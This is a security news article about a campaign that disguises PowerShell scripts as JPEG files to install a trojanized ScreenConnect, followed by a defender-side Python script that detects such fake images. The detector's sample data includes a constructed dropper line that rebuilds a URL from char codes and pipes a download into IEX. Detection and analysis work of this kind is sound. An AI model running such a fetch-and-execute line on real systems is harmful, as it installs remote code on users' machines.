Fake JPEG Images Used to Install Trojanized Remote Access Tool on Windows Systems

Operation SilentCanvas uses files carrying a .jpeg extension but containing PowerShell scripts to install a trojanized version of ConnectWise ScreenConnect for persistent remote access.

CSBadmin

How the Attack Works

A cyber espionage campaign named Operation SilentCanvas is targeting Windows computers by disguising malicious PowerShell scripts as JPEG image files. The attack begins when a victim receives a file named sysupdate.jpeg through phishing emails, fake update prompts, or file-sharing links. Although the file has a .jpeg extension, it contains no real image data. Instead, it holds a PowerShell script that creates a hidden folder on the system and downloads additional malicious components from attacker-controlled servers.

Once the initial script runs, the malware retrieves a trojanized version of ConnectWise ScreenConnect, a legitimate remote access tool commonly used in enterprise environments. The altered version gives the attackers a persistent, hidden backdoor while blending in with trusted software already present on the system. The malware also uses a fileless technique to gain elevated privileges without triggering visible security warnings, abusing a trusted Windows binary to bypass User Account Control prompts.

Impact and Scope

The campaign chains together multiple advanced techniques to evade detection. The malicious file omits the standard header that every real JPEG carries, so Windows does not flag it as a script. Dangerous command strings are reconstructed at runtime rather than written plainly in the file, helping the malware avoid antivirus detection. A secondary payload named access.jpeg runs directly in memory, leaving no suspicious executable on disk. Researchers at Cyfirma identified and analyzed the full attack chain, showing how the intrusion reaches deep into targeted environments. Organizations using remote access tools should review their security controls and user awareness training to defend against such file-based deception attacks.
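As an added example, not taken from the article or from Cyfirma's analysis, the following Python triage check turns the header observation above into a defender-side test: any file named like an image but lacking the JPEG Start-of-Image marker is flagged, and its bytes are scored for PowerShell markers, including the char-code and -join idioms used to rebuild command strings at runtime. The file names, regex patterns and sample contents are constructed for illustration; the URL is a placeholder.

```python
import re

JPEG_SOI = b"\xff\xd8\xff"  # Start-of-Image marker that every real JPEG begins with
IMAGE_EXTS = (".jpg", ".jpeg")

# Heuristic markers of PowerShell inside a file that claims to be an image.
# Because the campaign rebuilds command strings at runtime, the char-code and
# -join idioms used for that sit alongside the obvious download/execute calls.
PS_PATTERNS = [
    rb"\$\w+\s*=",                                  # variable assignment
    rb"(?i)\bInvoke-Expression\b|\bIEX\b",          # execute a string
    rb"(?i)New-Object\s+(System\.)?Net\.WebClient",
    rb"(?i)DownloadString|DownloadFile|Invoke-WebRequest",
    rb"(?i)\[char\]\s*\d+",                         # char-code reconstruction
    rb"(?i)-join\b",                                # joining fragments at runtime
    rb"(?i)-EncodedCommand|FromBase64String",
]


def classify(data: bytes) -> tuple[str, list[str]]:
    """Return (verdict, matched_patterns) for one file's raw bytes."""
    hits = [p.decode() for p in PS_PATTERNS if re.search(p, data)]
    if data.startswith(JPEG_SOI):
        return ("jpeg", hits)
    if len(hits) >= 2:          # two independent markers: treat as a disguised script
        return ("script_disguised_as_jpeg", hits)
    return ("not_a_jpeg", hits)


def triage(files: dict[str, bytes]) -> dict[str, str]:
    """Map every image-named file whose content is not a JPEG to its verdict."""
    return {
        name: classify(data)[0]
        for name, data in files.items()
        if name.lower().endswith(IMAGE_EXTS) and classify(data)[0] != "jpeg"
    }


# Constructed samples: a minimal real JPEG header, a fake "image" holding a
# PowerShell dropper in the style the article describes, and an honest .txt file.
SAMPLES = {
    "photo.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00\xff\xd9",
    "sysupdate.jpeg": (
        b"$d = Join-Path $env:APPDATA ('s' + 'ys'); New-Item -ItemType Directory $d -Force\n"
        b"$u = -join ([char]104, [char]116, [char]116, [char]112)\n"
        b"(New-Object Net.WebClient).DownloadString($u + '://example.invalid/a.jpeg') | IEX\n"
    ),
    "notes.txt": b"$x = 1\nIEX $x\n",  # a script, but not pretending to be an image
}

if __name__ == "__main__":
    for name, verdict in triage(SAMPLES).items():
        print(f"{name}: {verdict}")
```

In a real deployment the same check would run over a mail gateway's attachment store or an EDR file-creation event stream rather than an in-memory dict.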

Source: Cyber Security News
